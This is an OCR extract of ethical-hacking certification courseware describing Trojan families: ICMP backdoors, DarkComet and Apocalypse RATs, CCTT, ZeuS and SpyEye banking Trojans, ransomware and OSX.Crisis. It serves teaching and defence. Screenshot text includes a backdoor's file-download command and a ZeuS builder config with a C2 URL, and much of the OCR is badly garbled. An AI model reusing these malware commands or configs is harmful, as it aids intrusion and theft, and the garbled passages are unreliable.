Attackers simply pass them, drop them, or return them. The Trojan packets themselves are masquerading as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information. Covert channels are methods in which an attacker can hide the data in a protocol that is undetectable. They rely on techniques called tunneling, which allow one protocol to be carried over another protocol. A covert channel is defined as a vessel through which the information can pass, and it is generally not used for information exchanges. Therefore, covert channels cannot be detected by using standard system security methods. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine.

Module 06 Page 901

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

ICMP Client
(Command: icmpsend Cvictim ip>)
Command Prompt
C:\Docum ents and S«ttlngs\Adm lnistrator.VINDOWS\Desktop\l C M P B a c k d o o r Win32>icmp Send 127.0.0.1 =====w«ico«ne to ww>v.hachgrxfil*s.n«====== — [ ICM P-Cm d v1 0 beta, by g xisone J —
— { E-mail: qxisone@ hotm ail com ] —

ICMP Trojan:
ic m p s e n d

ICMP Server
(Command: icmpsrv -install)
Command Prompt

Commands are sent using ICMP protocol

C:\Documents and Settiings\Admini3trator.VVJDOWS\De9ktop\ICMP Backdoor Win32>icmp
Srv -in sta ll — -Welcome to www.tiat ketxf i les.net— — — — — [ ICMP-Cmdvl.O beta, bygxisone ] — — [ F-mdil: gxisone@hotmail.com ] — -[ 2012/8/15 J---

—C

2012/8/15] —

U sag e : icm psend R em o telP Ctrl+ C or Q^q to Quite H/h for help ICMP-CMD>H

[http:/n 27.0.0.1/hack.exe =admin.exe] <Download Files. Parth is Wsystem 32>
[pslist] <List th e Process>

[pskill ID]
Com m and IC M P-C M D

<Kill the Process>
<run th e c o n man d>

Usage: Ia n psrv-install <to install service> Icm psrv-re move <1.0 remove service> Transmitting File‫ ״‬. Success I Cieating Service _. Success I starting Service... Pending... success! c:\Documents and Settings\Admi nistrator. v!Ntx)Wb\Desktop\1C M ’Backdoor

FIGURE 6.27: ICMP Tunneling

Module 06 Page 902

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

R e m o te A c c e s s T r o ja n s

CEH

1 1 1
Attacker gains 100% I_______ (complete) access to the system _________

Rebecca Victim
Infected with RAT Trojan

J J

This Trojan works like a remote desktop access Hacker gains complete GUI access to the remote system

1.

Infect (Rebecca's) computer with server.exe and plant Reverse Connecting Trojan

2.

The Trojan connects to Port 80 to the attacker in Russia establishing a reverse connection Jason, the attacker, has complete control over Rebecca's machine

3.

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

R em ote A ccess T rojans
1 — 1 — Remote access Trojans provide full control over the target's system to attackers and enables them to remotely access files, private conversations, accounting data, and so on in the target's machine. The remote access Trojan acts as a server, and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the target is behind a firewall on the network, there is less chance that a remote attacker would be able to connect to the Trojan. Attackers on the same network located behind the firewall can easily access the Trojans. Examples include the Back Orifice and NetBus Trojans. Another example, the Bugbear virus that hit the Internet in September 2002, installed a Trojan horse on targets' systems, giving access to sensitive data to the remote attackers. This Trojan works like a remote desktop access. The attacker gains complete GUI access to the remote system. The process is as as follows: 1. Infects (Rebecca's) computer with server.exe and plants Reverse Connecting Trojan. 2. The Trojan connects to Port 80 to the attacker in Russia establishing a reverse connection.

Module 06 Page 903

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

3. Jason, the attacker, has complete control over Rebecca's machine.

Attacker gains 100% (complete) access to the system

Jason Attacker
Sitting in Russia

Rebecca Victim
Infected with RAT

FIGURE 6.28: Attacker infecting victim's machine using Remote access Trojans

Module 06 Page 904

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

R e m o te A c c e s s T r o ja n : RAT D a r k C o m e t a n d A p o c a ly p s e
hSodi D 7> Wan/Qian]: Port • • • • • ■ 59/[192.1... 5.154‫־‬f [192... ♦2.43/[192... *6.142 / [192... 27/[192.1... 138/[:92....

r c ll
1z .

E?

11 1668 M ctnw F. . . 92G V icb m esF .. L9 C C V ictm ejF... . Y lco m esF ... IU1 0 1 2■viam esF .. . U ctm e*F .. .1 3 2 •* \p < t1m esF... . :C ‫־‬ « \X X m esF ... C11076 V W > m «F ... u 18C 4 V < t & 13 6 C ttcbm tiF... m :092 ttcanesP... G110 8 0 Ul::l6 i. 1 8 ** V K tim e jf...
•I 96*» vicomwf... 1:60 . t J :2^0 wCfn«*F...

•6. 136/ ] 192.... 150/ ] 192.... 27/ ] 192.1... •6.28/ ] 192.... • ♦ 2.43/ ] 192... • 55/ ] 192.1... .07/ [192.1... • - m *4/[192.16... • tm .46.142 /[192... ‫ ״• • י‬172/ ] 78.2... • •

23/] 1 9 2 ‫״‬..

LSC60T-HI / C<*is3'2 0IIV2/SYSTEM AfJTHOHYLOPSZ f 5ys... PC-OESHCLGO/Sho... ANTHONYLOPEZ / u * ... SNAKE-E7D71CD4A If . . . DIV2 / Acrr»n>itr*t*ur PC■0CSHXEX3 / Sho... PCOS-MOI / rxx SNAKE137CO-PC /« **... PC0 6 •ALEX / ALEX TTANCtM / Adnrwfr«... L5C0OT-III / SYSTEM DAMJEN-PC 1 d*n*c OAVIDOURS-PC / D*v. PC-OC-AlOC /SYSTEM

Windows Wndore Wndov• 1 Window windows Window* Wrtdows W«do/tt Windows Wndov* Vfedow• W*d0W‫ג‬ WHdOWS

u1:1 2 8 \<bv&F...
Trr».‫ •׳‬D»t

- • Sl/[192.1...
.07/[192.1...

m o o
D

‫ יל‬v‫<־‬ a 7
• •

? * 1

‫ג‬
• •

W n d o % * f9 W in dow S W ndo. »

IP WAN/&.AN] : Pert ‫־ • • ־־‬ * • •

19:1 4 c37/:2/03/2010 19:14• 38/: 2/03/20:0 19; 14. • ‫י‬0/:2/03/20:0 19:14:44/12/03/2010 19:14t 44/12/03/20:0

VKQmesf... V1<trr«cF... \k U tc5T... VkbfnesF... Lpdat*

' I■ • vtcom esF... ‫ * י‬- ^

tm% •


•.

] Status: Kt*rtng.

Copyright © by EC-ClllCil. All Rights Reserved. Reproduction is Strictly Prohibited.

R em ote A ccess T rojan: RAT D a rk C o m et an d A pocalypse
DarkComet is a tool that allows you to remotely access the administrative controls and privileges of an infected machine without the user's knowledge or permission. It provides you with access to processes, registry, command prompts, webcams, microphones, applications and can even provide a keylogger whenever you use the system.

Module 06 Page 905

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

tD arkComet•R A T v2j0 R C 3 •Uset(s): 2 1 IPW an/lLan]: Port C 0 "t>ut*r Htmt/jtvU... O S e ‫־‬ .Vr^5Ses«o [7600] * • • * 59/(1921... S0RAr*5/$y»t*m a - 1 9 2 ] /164.‫צ‬... K0‫־‬ C4tAC^/5r5T»r wnd»**vata Sarvica... -O C -M O I/S Y S T C V w m oorteV «USarvKt... • 4:.43/[l»2... ^C O O T-X n/daee*42 v v w !d » M « $e‫׳‬v > ceP... • — at. 143/(*2.. .SO DIM Z/SO TM .V rxS > .S X P Ser.-ceP... •a•• 27/(1921... • • 136/[192.... ANTWa0PK/Sy*... •..•ndo‫־‬ A«Sr.«n [7600] ndov«v«staServe*... ‫• ׳ ־‬6.28/] 1 9 2‫״‬.. ?C ‫־‬ t€‫־‬ SH(XOt3/Sfo... W • « 136/ [192.... A W T H C ^Y L0P€2/utl... \Mndb«Se*n [7600] ‫״‬ ‫־‬ rx»A5XPS«r,ic*P... • • 150/[192.... S N A K E ■ C 7071C 04Aif... V IM T/ A 4rrv*»?ete1r e•• %27/ [1921... 5 X PSert-ceF... -5.28 / [192— 9C-0e-5HOtEXJ/»a... ..'‫י׳‬vata Servtca*.>0... v.rxtoA 'Svata Service... wometf. • 42.43/[1M ... ?C -O E -M O I/bo * iA ‫<׳‬El3700^C/sr•... v.rx»A vwmesf. at A. aa 55/(1921... S 5Se% tn [7600] W ctnxjP. • *A ^X/ A i£ X u'n& r;*vat»S e% ‫־‬ > c» ... • .07/(1921... ^C06‫־‬ .V x to ‫׳‬jvsx? Ser.-ceP... vomesF. - • 44/[192.16... TITA N nx/ A d‫־‬ Tr**fa... Y vorxsF. • - 6.142/[192... .S080T-m v.rx^Ai x? Se‫־‬.‫־‬ce P... /SY ST&‫׳‬ .V rxJa‫־׳‬ Se5‫־‬.» T 1]7600[ P C.'dan«r M cO m aaP . « « • 172/[78.2... 5AV»i‫־‬ vvtim eeP. - aa %51/(192.1... D A V Z X X ftS^C ‫י^ם‬... • ‫^״״‬.sSe.t« [7600] v scttm eaP . aa • v07/ [192 1... 9C .‫־‬ nd»A <vata Se‫־׳‬ v > c*... -0E ‫־‬A ^X/ S Y S T S 4 v UV«4vKVO(any*S m tm e> 0/ ‫־ •ח‬ t^an ‫ ^יל‬0‫»י׳לג^רד‬48‫ג‬ IPW A N /IL A N ]:P0 rt T w eyO ate ID 1 9 : 14:37/12/03/2010 V X tjm esF... - - :3490 i* ” 34» 1 9 : 14:38/12/03/2010 V<tme*... » . • » * I t” ah aa !]:3490 19:14:40/12/03/2010 VlctnaP... ‫• ־‬ 4 ‫נ‬0 ‫י״‬ 19:14:44/12/03/2010 v<o‫*׳‬ejp... ‫־‬ • - • aa 3:[2‫»*״‬ 19:14:44/12/03/2010 V X am eiP... - m %a Mi — ; 3490 _ :‫ד‬ < ‫ריג־‬ 1a814:44/1?inv3ft1n _ __ m. ‫—►״‬ E ck tServer uxiate Statui! Iaterw > g... O oanPort(•) Q SendO rder*
t S o * 1 1668 M920 J 100 .4 M O 111012 n»44 v 1924 . 1040 I 11076 i 1104 . 13*0 .. 1092 1 1 1030 1 11116 i 1344 » 564 M !260 i 11240 I ■1129 . ‫חיי‬4 *cton

10 vyom w F. V K C m uP . vxom eeP. vkem eaP. W O m esF . V < tm e*P . vtcom asf. v < t> m esF . vxtm wP. V K tm ejP.

A . X X X X X X X X X X X X X X X X X X V

C ‫א‬ X x x

Png :09*5 9 4 M J :66N ‫׳‬, 9 3 M * 7 8 M s 3 4 3 N S x 173* 3 6 0 M * 4 7 M J 9 3M j x 9 3 M s x :3 3 .V S 7 9 M j x 6 3 M 5 1 7 1 M * x 9 3 M S x :7 2 M » 07* ■ ‫א‬M f X :2 5 M S

A ctiveC aptM n 0. * :at 21294s 69‫ל‬IS 8747* 5274* Prog‫׳‬am 4730* 340365 1 S 4 5 S 1 81s 1 4 2 * 4731* 15456s vertasem eot 719s avast1 •A 1 5 3Is ■ • ‫>׳‬ ID IE RR IO L C C X R T ... 3 4 1 5 D __ ‫_״‬ _ 36305 SRO.Oent S 2305 L acre ca^eaVye(... 05 0 • T otalC onm a«der 7.50... 76S 0 1 S an A ct% «C ap6 0 n D IU IE R R I0U C 0U R T< » • 8hotm a<.com > WO.Oent

notm a<.fr> lare <•/»•*> ^•® ' Toia C om m ander 7.50pubfcbe‫־‬ .o6‫־‬M »d»etM etth... ■ 1

FIGURE 6.29: RAT DarkComet Screenshot

Apocalypse Remote Access Trojan is a tool that allows you to modify the entire registry and allow .dl files to run executables. This runs in invisible mode when it is executed. 4 .4 1
-

Apocalypse Remote A d m in istratio n Tool v l .

V let ton Online

~ A C onnections Brooded .j Settngj / B ulder X* SUtsbcs ‫ ל‬A bout a O Irtform ahcn C oinputer N am e U sernam e Server© W an f| P CW orm ebon 0 4‫ויי‬p0crfypse_8C 9C 6S15 E C C273FF53A ... H ectors 1 2 7 .0 .0 .1 Server W ornM bon InstaledA ppfcattons A ctivePorts >< Message H o i Server K) apOcalypse 8 C9 C6 b1 1 2 7‫ל‬0 .0 .1 9 1 2 7 .0 .0 .1 U X a 5) A ccessories M«1*9«Bo . Uniag- L ai R em oteD esktop 41 M essageIcon JK r,-. W ebcamC apture ■ 4 ®OK O ym. no C' R w -y C ancol ‫ >י‬A u c fc oC apture ‫ י־‬:ajK aytoggar 0«C 4rc^ OY« N o Cvcol OM >o » Rrty Ignc. Orkie K eylogger 0 O fftneK eytoggat 0 M w m im ■ I *C o fW M va b o n *8 Jp C hat Server © SandM essage B ^M anagers M eM anager 3 M eSearch Imtalled Applications Server V : *pOcolypte BC9C6b1b 1) 1 0 0 t H O 0.1 f T i f & y) R em oteO ow rtoed Pegstry Edtor D isplayN am e V ersion Urm stelStm g * O pboardM anager c:\Program Fies\C om m onM OAtfabeAB( A dobeSystem sIn c C lpboardT ext A lch em yR em ote£> ecutor * C :\F »o^arr>F tasV A khem yR fie C lpboerdM at Ij U pdatefar wndomXP(1*911164) l“ M croaoft C orporation O StaticM anager )3.4.0(arH JS C :\PtogramF «es\M uA aFeel IM h ServiceM anager T rW SQ lyog 8.55 ) 55 »ogramM es\SQ lyog T ri W abyogSoftw orfePvt.U d. C\P ProcessM anager R om anfrxsdon(R otas) M odJes 0 * c:\w em p V jran sO O O .exe* C:\PtogranPtes\w»P<**1* “‫ ־ל‬W indowM anager A C ET ectnoioges 4.1.0-2001 C C om m andP rom pt ■ C VlAnRAR actever C:\Pro*an Ffes\w *R A A U s OE xplorer Sattngs jW ebttfrsXP 9 .S0 .7 S2 3 -, M crotoft C orporation *B * f% jgr sCxec.exe/I{ A C 766A d6-7 A dobeSystem sIncorpora... M * J Adobe Raader 9 .3 . 3 s* Passw ordM anager ,H AM« A ft‫׳‬ M aF10 f an HAIM TTTM I9

?

r

2.0.3.13070 M 0 ilaFre#0■ (3 60)

S

93 .3
.

aOC ontact U s I A bout N oC onnecbon‫׳‬

F ^ S h if* 4
Webste £

‫ וחל‬1 % ‫»לו‬

rw tale^ppkahor^^ecer^e^

FIGURE 6.30: Apocalypse Screenshot

Module 06 Page 906

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

C overt C h a n n e l T ro jan : CCTT I C EH
J Covert Channel Tunneling Tool (CCTT) Trojan presents various exploitation techniques, creating arbitrary data transfer channels in the data streams authorized by a network access control system It enables attackers to get an external server shell from within the internal network and viceversa It sets a TCP/UDP/HTTP CONNECT | POST channel allowing TCP data streams (SSH, SMTP, POP, etc...) between an external server and a box from within the internal network

J J

Client

Proxy Chain

CCTT Server

Copyright O by EG-Gllincil. All Rights Reserved. Reproduction is Strictly Prohibited

C overt C h a n n e l T rojan: CCTT
The Covert Channel Tunneling Tool is a hidden channel tool. It provides you with many probable ways to achieve and allow arbitrary data transfer channels in the data streams (TCP, UDP, HTTP) authorized by a network access control system. A Covert Channel Tunneling Tool (CCTT) Trojan presents various exploitation techniques, creating arbitrary data transfer channels in the data streams authorized by a network access control system. It enables attackers to get an external server shell from within the internal network and vice versa. It sets a TCP/UDP/HTTP CONNECT|POST channel allowing TCP data streams (SSH, SMTP, POP, etc...) between an external server and a box from within the internal network.

Client

Target Services

FIGURE 6.31: Covert Channel Trojan
Module 06 Page 907 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

E-banking Troj ans

im ttiM

CEH
tUx*l NmIm

E‫־‬b a n k in g T ro jan s
E-banking Trojans are very dangerous and have become a major threat to the banking transactions performed online. This Trojan is installed on the victim's computer when he or she clicks the email attachment or clicks on some advertisement once the target logins in to the banking site. The Trojan is preprogrammed with a minimum range and maximum range to steal. So it doesn't withdraw all the money from the bank. Then the Trojan creates screenshots of the bank account statement; the victims aren't aware of this type of fraud and thinks that there is no variation in their bank balance unless they check the balance from other systems or from ATM machines. Only when they check the balance will the differences be noticed. The following diagram explains how the attack is carried out using E-banking Trojans.

Module 06 Page 908

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Malicious advertisements published among the legitimate websites

Uploads malicious advertisements

Malware Server
'

User access to infected website

‘W
^ User redirects to malicious exploit kit

The website is redirected to —• • the maNciousexploit kit 4 W Trojan reports for a new bot Sends instruction to the Troj,

Legitimate Websites

s.

^0

The User's PC exploited

^ Trojan reports user activities

Attacker

’ *
User access bankA/C

9# !
■ > 2 #

r

w
Instruction to manipulate banks transactions

$
‫י‬ |JI] |

Control and Command Server A

Manipulates user's bank transaction

Reports about successful/failed transaction

Financial Institution FIGURE 6.32: illustrating the attack using E-banking Trojans

Here the attacker first infects the malicious advertisements and publishes these advertisements among genuine websites. When the victims access the infected website, it automatically redirects him or her to a website from where the exploit kit gets loaded onto the victim's system. Thus, the exploit kit allows the attacker to control what is loaded in the victim's system and used for installing a Trojan horse. This malware is highly obfuscated and can only be detected by few anti-virus systems. The system of the victim is now a botnet from where the Trojan easily sends and receives instruction from the control and command server without the knowledge of the victim. When a victim access his or her bank account from the infected system, all the sensitive information, i.e., used by the victim in accessing account information such as login credentials (user name password), phone number, security number, date of birth, etc. are sent to the Control and Command Server by the Trojan. If the victim is accessing the transaction section of the banking website for performing online transactions, then the data that is entered by the victim on the transaction form is sent to the Control and Command Server instead of to the bank website. The control and command server system analyzes and decodes the information and identifies suitable money mule bank accounts. The Trojan receives instructions from the control and command server to send the latest transaction form that is updated by the control and command server to the bank for transferring money to the mule account. Confirmation from the bank about successful/failed transaction of the money that was transferred is also reported by the Trojan to the control and command server.

Module 06 Page 909

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Banking Trojan Analysis
e Trojan intercepts valid entered by a user

I

(•rtifwtf

CEH
ItkNjI Nm Iw •

0

It replaces the TAN with a random number that will be rejected by the bank

I

Q Attacker can misuse the intercepted TAN with the user's login details

Trojan creates fake form fields on e-banking pages Additional fields elicit extra information such as card number and date of birth Attacker can use this information to impersonate and compromise victim's account
a a a Trojan analyses POST requests and responses to victim's browser It compromises the scramble pad authentication Trojan intercepts scramble pad input as user enters Customer Number and Personal Access Code

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

B an k in g T rojan A nalysis
A banker Trojan is a malicious program that allows obtaining personal information about users and clients using online banking and payment systems. A banking Trojan analysis involves the following three basic types:
Tan Gabbler: A Transaction Authentication Number (TAN) is used for authenticating the online

banking transaction, which is a single-use password. The banking Trojan explicitly attacks the target's online banking services that depend on the TAN. When the TAN is entered, the Trojan grabs that number and changes that number with any random number that is incorrect and rejected by the bank. The content is filtered by the Trojan and the incorrect number is replaced in order to satisfy the target. An attacker can misuse the intercepted TAN with the target's login details.
HTML Injection: This type of Trojan creates duplicate fields on the online banking sites and these extra fields are used by the attacker to collect the targets account details, credit card number, date of birth, etc. Attackers can use this information to impersonate and compromise the target's account. Form Grabber: This is an advanced method of collecting data from the Internet available on the various browsers. This is highly effective in collecting the target IDs, passwords, and other sensitive information.

Module 06 Page 910

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

E ‫־‬b a n k in g T ro ja n : ZeuS a n d SpyE ye
J

C EH

The main objective of ZeuS and SpyEye Trojans is to steal bank and credit card account information, ftp data, and other sensitive information from infected computers via web browsers and protected storage SpyEye can automatically and quickly initiate an online transaction

J

ZeuS Control Panel
Builder Config and loader tuldng Sou‫־‬c9corfig file:

' :iHnri !rents and

SpyEye
] ( Bjild corFij ] M

|

Edit conFg

o

^ J f ln O W O

jl

Statistic

Settings

J

Output L00dr>3 conFlg from filo 1 C:\D00jrnorts ond aemnQSlK0bayaih\Desttop\rroyanoJ»j:AZeu5\bMl\ccnf1 Q.M Loodng succoododl

craacino l o a d e rf i e\ : \ l > 0: : u r r e n t s a r 1c bolneH MAIN I

Soltlngs\Koboya5h\DosW:op\rrovano ZouSVdr.oxo1. trr»r_ccnfig-3SOCOOO, 60000 tmsrJ 0as-*>ui)ui). touuu trror_5tate- 60000 ,200000 ‫נ‬ irl conl‫־‬a ‫=׳‬hO:D://203.H 2.10.2/ ‫׳<׳‬/ou‫׳‬travfv»ed.iclabr1 u‫׳‬l_compip-h‫׳‬:tp ://Wiabsmyip. car/ tsjld succeeded!

( ’pJN M tvJ at hr!‫'־‬, /*vox miorrtoft-Anvlowi 0 Ooyou*••) *anrtoMrm<tN)«(v«v1 w4 )c«0 «x<»«1 1 ’ CK ‫ן‬

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

E‫־‬b a n k in g T rojan: ZeuS an d SpyEye
ZeuS
Source: http://www.secureworks.com ZeuS is a latest threat for online banking transactions as it uses both form grabber as well as keystroke logging. It is mainly spread through drive-by downloads and phishing schemes. The ZeuS botnet targets only Windows. New version of ZeuS even affects Windows Vista. It has evolved over time and includes a full arsenal of information stealing capabilities: © Steals data submitted in HTTP forms 0 Steals account credentials stored in the Windows Protected Storage

Q Steals client-side X.509 public key infrastructure (PKI) certificates 0 Steals FTP and POP account credentials

Q Steals/deletes HTTP and Flash cookies 9 9 Modifies the HTML pages of target websites for information stealing purposes Redirects targets from target web pages to attacker controlled ones

Q Takes screenshots and scrapes HTML from target sites

Module 06 Page 911

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

9 9 9 9

Searches for and uploads files from the infected computer Modifies the local hosts file (%system root%\system32\drivers\etc\hosts) Downloads and executes arbitrary programs Deletes crucial registry keys, rendering the computer unable to boot into Windows
&» ZeuS Control Panel
IBuilder
Logs decoder

Builder Config and loader building Source config file: C:\Documents and Settings\Kobayash \Desktop\Troyano_ZeuSV [ Browse...

1

|

Edit config

| |

Build config

| |

Build loader

Output Loading config from fie 'C:\Documents and Setthgs\Kobayashi\Desktop\Troyano_ZeuS\ZeuS\local\config.txt'... Loading succeeded1 Creating loader file 'C:\Documents and Settngs\Kobayashi\Desktop\Troyano ZeuS\ldr.exe'... botnet«[MAIN] timer_conf!g-3600000, 60000 timerJogs-60000, 60000 timer_stats-1200000, 60000 url_config-http://203.142.10.2/~ytxjrtrav/web/cfg.bin url_comp!p=http://what smyp.com/ Buld succeeded! *

1

FIGURE 6.33: ZeuS Screenshot

SpyEye
SpyEye is malicious software that is used by the attacker to steal targets' money from online bank accounts. Actually, this is a botnet with a network of command-and-control servers. This automatically triggers when the target starts his or her transaction and can even block the bank's transactions. r

Spy Eye
2009 O * * ‫נ‬ 133120
12/79

^

Find INFO

2 2 1 :

1

Statistic

Settings

1‫ו‬ ‫•נ‬ L I «

G e t s t a t is t ic
Get hosts
D«V for :

*‫ם״‬ ‫ יי׳‬t

CTp»Hk*m m* http //www.m!crosoft‫־‬w<ndows-s<cufTty com co_
© Do you really to ban th « hotf (wwMr.

9 0 0 90

k .c m ) ?

OK

[

Ot m o m

]

w.d«lm(H«*nung ■com

431 427 342

•X •X •X •X •X •X •X »x •X •X

FIGURE 6.34: SpyEyeScreenshot

Module 06 Page 912

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

D estructive Trojans: M 4sT3r Trojan
M 4sT3r is a dangerous and d estructive ty p e of Trojan

C EH

This Trojan formats all local and network drives

When executed, this Trojan destroys the operating system

The user will not be able to boot the Operating System

Format USB Drive, network Drive....

Format C:\ E:\ F:\....

Copyright © by EG-G(Uncil. All Rights Reserved. Reproduction Is Strictly Prohibited

r

D estru ctiv e T rojans: M 4sT 3r T rojan

The M4sT3r Trojan is exclusively designed to destroy or delete files from the victim's computer. Files are automatically deleted by the Trojans, which can be controlled by the attacker or can be preprogrammed like a logic bomb to perform a particular task on a given time and date. When executed, this Trojan destroys the operating system. The victim cannot boot the operating system. This Trojan formats all local and network drives.

F o rm a t USB D riv e , n e tw o rk D r iv e .....

F o rm a t C :\ E :\ F : \ .....

M4sT3r Trojan

FIGURE 6.35: Attacker using M4sT3r Trojan for deleting or destroying files

Module 06 Page 913

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Notificatior Troj ans
■ Notification Trojan sends the location of the victim's IP address to the attacker B Whenever the victim's computer connects to the Internet, the attacker receives the notification

Notification Types
■> ■ > » ■> SIN Notification ICQ Notification PHP Notification E-Mail Notification Net Send CGI Notification IRC notification Directly notifies the attacker's server Notifies the attacker using ICQ channels Sends the data by connecting to PHP server on the attacker's server Sends the notification through email Notification is sent through net send command Sends the data by connecting to PHP server on the attacker's server Notifies the attacker using IRC channels

Victim
Infected with Trojan

}■
j.

> .»

•>

Copyright © by EG-Gouncil. All Rights jie$erv6<t;Reproduction is Strictly Prohibited.

N otification T ro jan s
Notification Trojans send the IP address of the victim's computer to the attacker. Whenever the victim operates the system, the notification Trojan notifies the attacker. Some of the notifications include: © SIN Notification: Directly notifies the attacker's server 0 ICQ Notification: Notifies the attacker using ICQ channels 0 PHP Notification: Sends the data by connecting to PHP server on the attacker's server 0 Email Notification: Sends the notification through email

0 Net Send: Notification is sent through net send command © CGI Notification: Sends the data by connecting to PHP serveron the attacker's server © IRC notification: Notifies the attacker using IRC channels

Module 06 Page 914

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Credit Card Troj ans

CEH
UrtifW itkMl lUckw

Attacker A :

Credit card Trojans steal victims' credit card related data such as card no., CVV2, and billing details

w
‫<יי‬

Credit card Trojans trick users to visit fake ebanking websites and enter personal information

Victim A

VISA

Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited

C red it C ard T ro jan s
Credit card Trojans, once they are installed on the victim's system, collect various details such as credit card numbers, latest billing details, etc. Then, a fake online banking registration form is created and they make the credit card user believe that it is genuine information from the bank. Once the user enters the required information, attackers collect the information and use the credit card for personal use without the knowledge of the victim. Credit card Trojans steal victims' credit-card-related data such as card number, CVV2s, and billing details. These Trojans trick users into visit fake e-banking websites and entering personal information. The Trojan servers transmit the stolen data to remote hackers using email, FTP, IRC, or other methods.

Module 06 Page 915

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

FIGURE 6.36: Attacker stealing credit card information of victim's using credit card Trojan

Module 06 Page 916

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

D ata Hiding Trojans (Encrypted Trojans)
Encryption Trojan encrypts data files in victim's system and renders information unusable Attackers demand a ransom or force victims to make purchases from their online drug stores in return for the password to unlock files

"Your computer caught our software while browsing i l l e g a lpom pages, a l l your documents, textf i l e s , databases i n the folder / Company M y Documents Database was encrypted with complex password."

C ♦ ♦source code Personal Information

(S

Important Files & Folders - - ‫ ־‬F

'Do not t r y to search for a program that k encrypted your ™ >information - i t ' simply does not Confidential Documents exi s t si n your hard disk anymore," Financial pay us the money to Informationw unlock the password

Copyright © by EC-CMICil. All Rights Jte$ervfei;Reproduction is Strictly Prohibited.

D ata H iding T ro jan s (E n cry p ted T rojans)
Encryption Trojans encrypt the data present on the victim's computer and renders the complete data unusable: "Your computer caught our software while browsing illegal porn pages, all your documents, text files, databases in the folder My Documents was encrypted with complex password." Attackers demand a ransom or force victims to make purchases from their online drugstores in return for the password to unlock files: "Do not try to search for a program that encrypted your information - it simply does not exists in your hard disk anymore," pay us the money to unlock the password." This can be decrypted only by the attacker, who demands money, or they can force the user buy from a few websites for decryption.

Module 06 Page 917

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

OS X Trojan: Crisis
B

CEH

OSX.Crisis is a Trojan horse that steals potentially confidential information and opens a back door on the compromised computer
When the Trojan is executed, it creates the following directories and files: /System/Libra ry/Frameworks/Foundation.framework/XPCServices/com.apple.mdworker_server.xpc/Contents/MacOS/com. apple, mdw orker_server /System/Libra ry/Frameworks/Foundation.framework/XPCServices/com.apple.nndworker_server.xpc/Contents/Resources/ $HOME/Library/LaunchAgents/com.apple.mdworker.plist $HOME/Library/Preferences/jl3V7we.app $HOME/Library/ScriptingAdditions/appleHID/Contents/lnfo.plist $HOME/library/ScriptingAdditions/appleHID/Contents/MacOS/IUnsA3Ci.Bz7 SHOME/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r

Crisis may perform the following actions:

1 --------------------------- V
Monitor Skype Audio traffic

Record conversations in MS Messenger and Adium ‫ר״‬

